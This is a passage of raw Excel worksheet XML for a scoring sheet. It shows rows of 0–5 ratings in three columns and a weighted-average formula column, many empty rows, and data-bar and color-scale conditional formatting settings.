    </row>
    <row r="62" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A62" s="6" t="s">
        <v>364</v>
      </c>
      <c r="B62" s="6"/>
      <c r="C62" s="7">
        <v>0</v>
      </c>
      <c r="D62" s="7">
        <v>0</v>
      </c>
      <c r="E62" s="7">
        <v>0</v>
      </c>
      <c r="F62" s="7">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="63" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A63" s="6" t="s">
        <v>365</v>
      </c>
      <c r="B63" s="6" t="s">
        <v>366</v>
      </c>
      <c r="C63" s="7">
        <v>0</v>
      </c>
      <c r="D63" s="7">
        <v>0</v>
      </c>
      <c r="E63" s="7">
        <v>0</v>
      </c>
      <c r="F63" s="7">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="64" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A64" s="6" t="s">
        <v>367</v>
      </c>
      <c r="B64" s="6" t="s">
        <v>368</v>
      </c>
      <c r="C64" s="7">
        <v>0</v>
      </c>
      <c r="D64" s="7">
        <v>0</v>
      </c>
      <c r="E64" s="7">
        <v>0</v>
      </c>
      <c r="F64" s="7">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="65" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A65" s="6" t="s">
        <v>367</v>
      </c>
      <c r="B65" s="6" t="s">
        <v>369</v>
      </c>
      <c r="C65" s="7">
        <v>0</v>
      </c>
      <c r="D65" s="7">
        <v>0</v>
      </c>
      <c r="E65" s="7">
        <v>0</v>
      </c>
      <c r="F65" s="7">
        <f>((C65*2)+D65+(E65*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="66" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A66" s="6" t="s">
        <v>370</v>
      </c>
      <c r="B66" s="6" t="s">
        <v>304</v>
      </c>
      <c r="C66" s="7">
        <v>0</v>
      </c>
      <c r="D66" s="7">
        <v>0</v>
      </c>
      <c r="E66" s="7">
        <v>0</v>
      </c>
      <c r="F66" s="7">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="67" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A67" s="6" t="s">
        <v>370</v>
      </c>
      <c r="B67" s="6" t="s">
        <v>371</v>
      </c>
      <c r="C67" s="7">
        <v>5</v>
      </c>
      <c r="D67" s="7">
        <v>5</v>
      </c>
      <c r="E67" s="7">
        <v>5</v>
      </c>
      <c r="F67" s="7">
        <f t="shared" ref="F67:F69" si="4">((C67*2)+D67+(E67*2))/5</f>
        <v>5</v>
      </c>
    </row>
    <row r="68" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A68" s="6" t="s">
        <v>370</v>
      </c>
      <c r="B68" s="6" t="s">
        <v>372</v>
      </c>
      <c r="C68" s="7">
        <v>5</v>
      </c>
      <c r="D68" s="7">
        <v>5</v>
      </c>
      <c r="E68" s="7">
        <v>5</v>
      </c>
      <c r="F68" s="7">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
    </row>
    <row r="69" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A69" s="6" t="s">
        <v>370</v>
      </c>
      <c r="B69" s="6" t="s">
        <v>373</v>
      </c>
      <c r="C69" s="7">
        <v>5</v>
      </c>
      <c r="D69" s="7">
        <v>5</v>
      </c>
      <c r="E69" s="7">
        <v>5</v>
      </c>
      <c r="F69" s="7">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
    </row>
    <row r="70" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A70" s="6" t="s">
        <v>374</v>
      </c>
      <c r="B70" s="6" t="s">
        <v>375</v>
      </c>
      <c r="C70" s="7">
        <v>2</v>
      </c>
      <c r="D70" s="7">
        <v>5</v>
      </c>
      <c r="E70" s="7">
        <v>5</v>
      </c>
      <c r="F70" s="7">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="71" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A71" s="6" t="s">
        <v>374</v>
      </c>
      <c r="B71" s="6" t="s">
        <v>376</v>
      </c>
      <c r="C71" s="7">
        <v>2</v>
      </c>
      <c r="D71" s="7">
        <v>5</v>
      </c>
      <c r="E71" s="7">
        <v>5</v>
      </c>
      <c r="F71" s="7">
        <f t="shared" ref="F71:F73" si="5">((C71*2)+D71+(E71*2))/5</f>
        <v>3.8</v>
      </c>
    </row>
    <row r="72" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A72" s="6" t="s">
        <v>374</v>
      </c>
      <c r="B72" s="6" t="s">
        <v>377</v>
      </c>
      <c r="C72" s="7">
        <v>2</v>
      </c>
      <c r="D72" s="7">
        <v>5</v>
      </c>
      <c r="E72" s="7">
        <v>5</v>
      </c>
      <c r="F72" s="7">
        <f t="shared" si="5"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="73" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A73" s="6" t="s">
        <v>374</v>
      </c>
      <c r="B73" s="6" t="s">
        <v>378</v>
      </c>
      <c r="C73" s="7">
        <v>2</v>
      </c>
      <c r="D73" s="7">
        <v>5</v>
      </c>
      <c r="E73" s="7">
        <v>5</v>
      </c>
      <c r="F73" s="7">
        <f t="shared" si="5"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="74" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A74" s="6"/>
      <c r="B74" s="6"/>
      <c r="C74" s="7"/>
      <c r="D74" s="7"/>
      <c r="E74" s="7"/>
      <c r="F74" s="7"/>
    </row>
    <row r="75" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A75" s="6"/>
      <c r="B75" s="6"/>
      <c r="C75" s="7"/>
      <c r="D75" s="7"/>
      <c r="E75" s="7"/>
      <c r="F75" s="7"/>
    </row>
    <row r="76" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A76" s="6"/>
      <c r="B76" s="6"/>
      <c r="C76" s="7"/>
      <c r="D76" s="7"/>
      <c r="E76" s="7"/>
      <c r="F76" s="7"/>
    </row>
    <row r="77" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A77" s="6"/>
      <c r="B77" s="6"/>
      <c r="C77" s="7"/>
      <c r="D77" s="7"/>
      <c r="E77" s="7"/>
      <c r="F77" s="7"/>
    </row>
    <row r="78" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A78" s="6"/>
      <c r="B78" s="6"/>
      <c r="C78" s="7"/>
      <c r="D78" s="7"/>
      <c r="E78" s="7"/>
      <c r="F78" s="7"/>
    </row>
    <row r="79" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A79" s="6"/>
      <c r="B79" s="6"/>
      <c r="C79" s="7"/>
      <c r="D79" s="7"/>
      <c r="E79" s="7"/>
      <c r="F79" s="7"/>
    </row>
    <row r="80" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A80" s="6"/>
      <c r="B80" s="6"/>
      <c r="C80" s="7"/>
      <c r="D80" s="7"/>
      <c r="E80" s="7"/>
      <c r="F80" s="7"/>
    </row>
    <row r="81" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A81" s="6"/>
      <c r="B81" s="6"/>
      <c r="C81" s="7"/>
      <c r="D81" s="7"/>
      <c r="E81" s="7"/>
      <c r="F81" s="7"/>
    </row>
    <row r="82" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A82" s="6"/>
      <c r="B82" s="6"/>
      <c r="C82" s="7"/>
      <c r="D82" s="7"/>
      <c r="E82" s="7"/>
      <c r="F82" s="7"/>
    </row>
    <row r="83" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A83" s="6"/>
      <c r="B83" s="6"/>
      <c r="C83" s="7"/>
      <c r="D83" s="7"/>
      <c r="E83" s="7"/>
      <c r="F83" s="7"/>
    </row>
    <row r="84" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A84" s="6"/>
      <c r="B84" s="6"/>
      <c r="C84" s="7"/>
      <c r="D84" s="7"/>
      <c r="E84" s="7"/>
      <c r="F84" s="7"/>
    </row>
    <row r="85" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A85" s="6"/>
      <c r="B85" s="6"/>
      <c r="C85" s="7"/>
      <c r="D85" s="7"/>
      <c r="E85" s="7"/>
      <c r="F85" s="7"/>
    </row>
    <row r="86" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A86" s="6"/>
      <c r="B86" s="6"/>
      <c r="C86" s="7"/>
      <c r="D86" s="7"/>
      <c r="E86" s="7"/>
      <c r="F86" s="7"/>
    </row>
    <row r="87" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A87" s="6"/>
      <c r="B87" s="6"/>
      <c r="C87" s="7"/>
      <c r="D87" s="7"/>
      <c r="E87" s="7"/>
      <c r="F87" s="7"/>
    </row>
    <row r="88" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A88" s="6"/>
      <c r="B88" s="6"/>
      <c r="C88" s="7"/>
      <c r="D88" s="7"/>
      <c r="E88" s="7"/>
      <c r="F88" s="7"/>
    </row>
    <row r="89" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A89" s="6"/>
      <c r="B89" s="6"/>
      <c r="C89" s="7"/>
      <c r="D89" s="7"/>
      <c r="E89" s="7"/>
      <c r="F89" s="7"/>
    </row>
    <row r="90" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A90" s="6"/>
      <c r="B90" s="6"/>
      <c r="C90" s="7"/>
      <c r="D90" s="7"/>
      <c r="E90" s="7"/>
      <c r="F90" s="7"/>
    </row>
    <row r="91" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A91" s="6"/>
      <c r="B91" s="6"/>
      <c r="C91" s="7"/>
      <c r="D91" s="7"/>
      <c r="E91" s="7"/>
      <c r="F91" s="7"/>
    </row>
    <row r="92" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A92" s="6"/>
      <c r="B92" s="6"/>
      <c r="C92" s="7"/>
      <c r="D92" s="7"/>
      <c r="E92" s="7"/>
      <c r="F92" s="7"/>
    </row>
    <row r="93" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A93" s="6"/>
      <c r="B93" s="6"/>
      <c r="C93" s="7"/>
      <c r="D93" s="7"/>
      <c r="E93" s="7"/>
      <c r="F93" s="7"/>
    </row>
    <row r="94" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A94" s="6"/>
      <c r="B94" s="6"/>
      <c r="C94" s="7"/>
      <c r="D94" s="7"/>
      <c r="E94" s="7"/>
      <c r="F94" s="7"/>
    </row>
    <row r="95" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A95" s="6"/>
      <c r="B95" s="6"/>
      <c r="C95" s="7"/>
      <c r="D95" s="7"/>
      <c r="E95" s="7"/>
      <c r="F95" s="7"/>
    </row>
    <row r="96" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A96" s="6"/>
      <c r="B96" s="6"/>
      <c r="C96" s="7"/>
      <c r="D96" s="7"/>
      <c r="E96" s="7"/>
      <c r="F96" s="7"/>
    </row>
    <row r="97" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A97" s="6"/>
      <c r="B97" s="6"/>
      <c r="C97" s="7"/>
      <c r="D97" s="7"/>
      <c r="E97" s="7"/>
      <c r="F97" s="7"/>
    </row>
    <row r="98" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A98" s="6"/>
      <c r="B98" s="6"/>
      <c r="C98" s="7"/>
      <c r="D98" s="7"/>
      <c r="E98" s="7"/>
      <c r="F98" s="7"/>
    </row>
    <row r="99" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A99" s="6"/>
      <c r="B99" s="6"/>
      <c r="C99" s="7"/>
      <c r="D99" s="7"/>
      <c r="E99" s="7"/>
      <c r="F99" s="7"/>
    </row>
    <row r="100" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A100" s="6"/>
      <c r="B100" s="6"/>
      <c r="C100" s="7"/>
      <c r="D100" s="7"/>
      <c r="E100" s="7"/>
      <c r="F100" s="7"/>
    </row>
    <row r="101" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A101" s="6"/>
      <c r="B101" s="6"/>
      <c r="C101" s="7"/>
      <c r="D101" s="7"/>
      <c r="E101" s="7"/>
      <c r="F101" s="7"/>
    </row>
    <row r="102" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A102" s="6"/>
      <c r="B102" s="6"/>
      <c r="C102" s="7"/>
      <c r="D102" s="7"/>
      <c r="E102" s="7"/>
      <c r="F102" s="7"/>
    </row>
    <row r="103" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A103" s="6"/>
      <c r="B103" s="6"/>
      <c r="C103" s="7"/>
      <c r="D103" s="7"/>
      <c r="E103" s="7"/>
      <c r="F103" s="7"/>
    </row>
    <row r="104" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A104" s="6"/>
      <c r="B104" s="6"/>
      <c r="C104" s="7"/>
      <c r="D104" s="7"/>
      <c r="E104" s="7"/>
      <c r="F104" s="7"/>
    </row>
    <row r="105" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A105" s="6"/>
      <c r="B105" s="6"/>
      <c r="C105" s="7"/>
      <c r="D105" s="7"/>
      <c r="E105" s="7"/>
      <c r="F105" s="7"/>
    </row>
    <row r="106" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A106" s="6"/>
      <c r="B106" s="6"/>
      <c r="C106" s="7"/>
      <c r="D106" s="7"/>
      <c r="E106" s="7"/>
      <c r="F106" s="7"/>
    </row>
    <row r="107" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A107" s="6"/>
      <c r="B107" s="6"/>
      <c r="C107" s="7"/>
      <c r="D107" s="7"/>
      <c r="E107" s="7"/>
      <c r="F107" s="7"/>
    </row>
    <row r="108" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A108" s="6"/>
      <c r="B108" s="6"/>
      <c r="C108" s="7"/>
      <c r="D108" s="7"/>
      <c r="E108" s="7"/>
      <c r="F108" s="7"/>
    </row>
    <row r="109" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A109" s="6"/>
      <c r="B109" s="6"/>
      <c r="C109" s="7"/>
      <c r="D109" s="7"/>
      <c r="E109" s="7"/>
      <c r="F109" s="7"/>
    </row>
    <row r="110" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A110" s="6"/>
      <c r="B110" s="6"/>
      <c r="C110" s="7"/>
      <c r="D110" s="7"/>
      <c r="E110" s="7"/>
      <c r="F110" s="7"/>
    </row>
    <row r="111" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A111" s="6"/>
      <c r="B111" s="6"/>
      <c r="C111" s="7"/>
      <c r="D111" s="7"/>
      <c r="E111" s="7"/>
      <c r="F111" s="7"/>
    </row>
    <row r="112" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A112" s="6"/>
      <c r="B112" s="6"/>
      <c r="C112" s="7"/>
      <c r="D112" s="7"/>
      <c r="E112" s="7"/>
      <c r="F112" s="7"/>
    </row>
    <row r="113" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A113" s="6"/>
      <c r="B113" s="6"/>
      <c r="C113" s="7"/>
      <c r="D113" s="7"/>
      <c r="E113" s="7"/>
      <c r="F113" s="7"/>
    </row>
    <row r="114" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A114" s="6"/>
      <c r="B114" s="6"/>
      <c r="C114" s="7"/>
      <c r="D114" s="7"/>
      <c r="E114" s="7"/>
      <c r="F114" s="7"/>
    </row>
    <row r="115" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A115" s="6"/>
      <c r="B115" s="6"/>
      <c r="C115" s="7"/>
      <c r="D115" s="7"/>
      <c r="E115" s="7"/>
      <c r="F115" s="7"/>
    </row>
    <row r="116" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A116" s="6"/>
      <c r="B116" s="6"/>
      <c r="C116" s="7"/>
      <c r="D116" s="7"/>
      <c r="E116" s="7"/>
      <c r="F116" s="7"/>
    </row>
    <row r="117" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A117" s="6"/>
      <c r="B117" s="6"/>
      <c r="C117" s="7"/>
      <c r="D117" s="7"/>
      <c r="E117" s="7"/>
      <c r="F117" s="7"/>
    </row>
    <row r="118" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A118" s="6"/>
      <c r="B118" s="6"/>
      <c r="C118" s="7"/>
      <c r="D118" s="7"/>
      <c r="E118" s="7"/>
      <c r="F118" s="7"/>
    </row>
    <row r="119" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A119" s="6"/>
      <c r="B119" s="6"/>
      <c r="C119" s="7"/>
      <c r="D119" s="7"/>
      <c r="E119" s="7"/>
      <c r="F119" s="7"/>
    </row>
    <row r="120" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A120" s="6"/>
      <c r="B120" s="6"/>
      <c r="C120" s="7"/>
      <c r="D120" s="7"/>
      <c r="E120" s="7"/>
      <c r="F120" s="7"/>
    </row>
    <row r="121" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A121" s="6"/>
      <c r="B121" s="6"/>
      <c r="C121" s="7"/>
      <c r="D121" s="7"/>
      <c r="E121" s="7"/>
      <c r="F121" s="7"/>
    </row>
    <row r="122" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A122" s="6"/>
      <c r="B122" s="6"/>
      <c r="C122" s="7"/>
      <c r="D122" s="7"/>
      <c r="E122" s="7"/>
      <c r="F122" s="7"/>
    </row>
    <row r="123" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A123" s="6"/>
      <c r="B123" s="6"/>
      <c r="C123" s="7"/>
      <c r="D123" s="7"/>
      <c r="E123" s="7"/>
      <c r="F123" s="7"/>
    </row>
    <row r="124" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A124" s="6"/>
      <c r="B124" s="6"/>
      <c r="C124" s="7"/>
      <c r="D124" s="7"/>
      <c r="E124" s="7"/>
      <c r="F124" s="7"/>
    </row>
    <row r="125" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A125" s="6"/>
      <c r="B125" s="6"/>
      <c r="C125" s="7"/>
      <c r="D125" s="7"/>
      <c r="E125" s="7"/>
      <c r="F125" s="7"/>
    </row>
    <row r="126" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A126" s="6"/>
      <c r="B126" s="6"/>
      <c r="C126" s="7"/>
      <c r="D126" s="7"/>
      <c r="E126" s="7"/>
      <c r="F126" s="7"/>
    </row>
    <row r="127" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A127" s="6"/>
      <c r="B127" s="6"/>
      <c r="C127" s="7"/>
      <c r="D127" s="7"/>
      <c r="E127" s="7"/>
      <c r="F127" s="7"/>
    </row>
    <row r="128" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A128" s="6"/>
      <c r="B128" s="6"/>
      <c r="C128" s="7"/>
      <c r="D128" s="7"/>
      <c r="E128" s="7"/>
      <c r="F128" s="7"/>
    </row>
    <row r="129" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A129" s="6"/>
      <c r="B129" s="6"/>
      <c r="C129" s="7"/>
      <c r="D129" s="7"/>
      <c r="E129" s="7"/>
      <c r="F129" s="7"/>
    </row>
    <row r="130" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A130" s="6"/>
      <c r="B130" s="6"/>
      <c r="C130" s="7"/>
      <c r="D130" s="7"/>
      <c r="E130" s="7"/>
      <c r="F130" s="7"/>
    </row>
    <row r="131" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A131" s="6"/>
      <c r="B131" s="6"/>
      <c r="C131" s="7"/>
      <c r="D131" s="7"/>
      <c r="E131" s="7"/>
      <c r="F131" s="7"/>
    </row>
    <row r="132" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A132" s="6"/>
      <c r="B132" s="6"/>
      <c r="C132" s="7"/>
      <c r="D132" s="7"/>
      <c r="E132" s="7"/>
      <c r="F132" s="7"/>
    </row>
    <row r="133" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A133" s="6"/>
      <c r="B133" s="6"/>
      <c r="C133" s="7"/>
      <c r="D133" s="7"/>
      <c r="E133" s="7"/>
      <c r="F133" s="7"/>
    </row>
    <row r="134" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A134" s="6"/>
      <c r="B134" s="6"/>
      <c r="C134" s="7"/>
      <c r="D134" s="7"/>
      <c r="E134" s="7"/>
      <c r="F134" s="7"/>
    </row>
    <row r="135" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A135" s="6"/>
      <c r="B135" s="6"/>
      <c r="C135" s="7"/>
      <c r="D135" s="7"/>
      <c r="E135" s="7"/>
      <c r="F135" s="7"/>
    </row>
    <row r="136" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A136" s="6"/>
      <c r="B136" s="6"/>
      <c r="C136" s="7"/>
      <c r="D136" s="7"/>
      <c r="E136" s="7"/>
      <c r="F136" s="7"/>
    </row>
    <row r="137" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A137" s="6"/>
      <c r="B137" s="6"/>
      <c r="C137" s="7"/>
      <c r="D137" s="7"/>
      <c r="E137" s="7"/>
      <c r="F137" s="7"/>
    </row>
    <row r="138" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A138" s="6"/>
      <c r="B138" s="6"/>
      <c r="C138" s="7"/>
      <c r="D138" s="7"/>
      <c r="E138" s="7"/>
      <c r="F138" s="7"/>
    </row>
    <row r="139" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A139" s="6"/>
      <c r="B139" s="6"/>
      <c r="C139" s="7"/>
      <c r="D139" s="7"/>
      <c r="E139" s="7"/>
      <c r="F139" s="7"/>
    </row>
    <row r="140" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A140" s="6"/>
      <c r="B140" s="6"/>
      <c r="C140" s="7"/>
      <c r="D140" s="7"/>
      <c r="E140" s="7"/>
      <c r="F140" s="7"/>
    </row>
    <row r="141" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A141" s="6"/>
      <c r="B141" s="6"/>
      <c r="C141" s="7"/>
      <c r="D141" s="7"/>
      <c r="E141" s="7"/>
      <c r="F141" s="7"/>
    </row>
    <row r="142" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A142" s="6"/>
      <c r="B142" s="6"/>
      <c r="C142" s="7"/>
      <c r="D142" s="7"/>
      <c r="E142" s="7"/>
      <c r="F142" s="7"/>
    </row>
    <row r="143" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A143" s="6"/>
      <c r="B143" s="6"/>
      <c r="C143" s="7"/>
      <c r="D143" s="7"/>
      <c r="E143" s="7"/>
      <c r="F143" s="7"/>
    </row>
    <row r="144" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A144" s="6"/>
      <c r="B144" s="6"/>
      <c r="C144" s="7"/>
      <c r="D144" s="7"/>
      <c r="E144" s="7"/>
      <c r="F144" s="7"/>
    </row>
    <row r="145" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A145" s="6"/>
      <c r="B145" s="6"/>
      <c r="C145" s="7"/>
      <c r="D145" s="7"/>
      <c r="E145" s="7"/>
      <c r="F145" s="7"/>
    </row>
    <row r="146" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A146" s="6"/>
      <c r="B146" s="6"/>
      <c r="C146" s="7"/>
      <c r="D146" s="7"/>
      <c r="E146" s="7"/>
      <c r="F146" s="7"/>
    </row>
    <row r="147" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A147" s="6"/>
      <c r="B147" s="6"/>
      <c r="C147" s="7"/>
      <c r="D147" s="7"/>
      <c r="E147" s="7"/>
      <c r="F147" s="7"/>
    </row>
    <row r="148" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A148" s="6"/>
      <c r="B148" s="6"/>
      <c r="C148" s="7"/>
      <c r="D148" s="7"/>
      <c r="E148" s="7"/>
      <c r="F148" s="7"/>
    </row>
    <row r="149" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A149" s="6"/>
      <c r="B149" s="6"/>
      <c r="C149" s="7"/>
      <c r="D149" s="7"/>
      <c r="E149" s="7"/>
      <c r="F149" s="7"/>
    </row>
    <row r="150" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A150" s="6"/>
      <c r="B150" s="6"/>
      <c r="C150" s="7"/>
      <c r="D150" s="7"/>
      <c r="E150" s="7"/>
      <c r="F150" s="7"/>
    </row>
    <row r="151" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A151" s="6"/>
      <c r="B151" s="6"/>
      <c r="C151" s="7"/>
      <c r="D151" s="7"/>
      <c r="E151" s="7"/>
      <c r="F151" s="7"/>
    </row>
    <row r="152" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A152" s="6"/>
      <c r="B152" s="6"/>
      <c r="C152" s="7"/>
      <c r="D152" s="7"/>
      <c r="E152" s="7"/>
      <c r="F152" s="7"/>
    </row>
    <row r="153" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A153" s="6"/>
      <c r="B153" s="6"/>
      <c r="C153" s="7"/>
      <c r="D153" s="7"/>
      <c r="E153" s="7"/>
      <c r="F153" s="7"/>
    </row>
    <row r="154" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A154" s="6"/>
      <c r="B154" s="6"/>
      <c r="C154" s="7"/>
      <c r="D154" s="7"/>
      <c r="E154" s="7"/>
      <c r="F154" s="7"/>
    </row>
    <row r="155" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A155" s="6"/>
      <c r="B155" s="6"/>
      <c r="C155" s="7"/>
      <c r="D155" s="7"/>
      <c r="E155" s="7"/>
      <c r="F155" s="7"/>
    </row>
    <row r="156" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A156" s="6"/>
      <c r="B156" s="6"/>
      <c r="C156" s="7"/>
      <c r="D156" s="7"/>
      <c r="E156" s="7"/>
      <c r="F156" s="7"/>
    </row>
    <row r="157" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A157" s="6"/>
      <c r="B157" s="6"/>
      <c r="C157" s="7"/>
      <c r="D157" s="7"/>
      <c r="E157" s="7"/>
      <c r="F157" s="7"/>
    </row>
    <row r="158" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A158" s="6"/>
      <c r="B158" s="6"/>
      <c r="C158" s="7"/>
      <c r="D158" s="7"/>
      <c r="E158" s="7"/>
      <c r="F158" s="7"/>
    </row>
    <row r="159" spans="1:6" x14ac:dyDescent="0.25">
      <c r="F159" s="2"/>
    </row>
    <row r="160" spans="1:6" x14ac:dyDescent="0.25">
      <c r="F160" s="2"/>
    </row>
    <row r="161" spans="6:6" x14ac:dyDescent="0.25">
      <c r="F161" s="2"/>
    </row>
    <row r="162" spans="6:6" x14ac:dyDescent="0.25">
      <c r="F162" s="2"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="F2:F162">
    <cfRule type="dataBar" priority="2">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{01917242-52DD-4328-B524-26DACB7DE176}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I8">
    <cfRule type="colorScale" priority="7">
      <colorScale>
        <cfvo type="min"/>
        <cfvo type="percent" val="50"/>
        <cfvo type="max"/>
        <color rgb="FFF8696B"/>
        <color rgb="FFFFEB84"/>
        <color rgb="FF63BE7B"/>
      </colorScale>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C1:E1048576 C2:E162">
    <cfRule type="dataBar" priority="1">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{276D75FF-118B-4788-B4FB-FECA7CF22A9E}</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1917242-52DD-4328-B524-26DACB7DE176}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F2:F162</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{276D75FF-118B-4788-B4FB-FECA7CF22A9E}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C1:E1048576 C2:E162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247"/>
  <sheetViews>
    <sheetView zoomScaleNormal="100" workbookViewId="0">
      <selection activeCell="B9" sqref="B9"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="20.85546875" style="14" customWidth="1"/>
    <col min="2" max="2" width="124.85546875" style="14" customWidth="1"/>
    <col min="3" max="3" width="21" style="15" customWidth="1"/>
